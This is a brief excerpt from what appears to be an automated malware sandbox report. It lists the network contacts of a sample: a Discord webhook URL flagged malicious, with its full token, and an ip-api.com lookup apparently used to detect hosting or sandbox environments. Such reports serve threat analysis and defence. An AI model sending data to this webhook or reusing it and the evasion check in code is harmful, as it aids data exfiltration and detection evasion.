Contacted Domains

Name IP Active
discord.com 162.159.136.232 true
ip-api.com 208.95.112.1 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://discord.com/api/webhooks/1240617539009249350/TqBzgc6PPLDK8U9sL3OIQ7VPVwnDIoONcaMLCG9G1Uo5vMQ9KEFuAEkuqQ_6XKEkyetX true
  • Avira URL Cloud: safe
 unknown
http://ip-api.com/line/?fields=hosting false
  • URL Reputation: safe
 unknown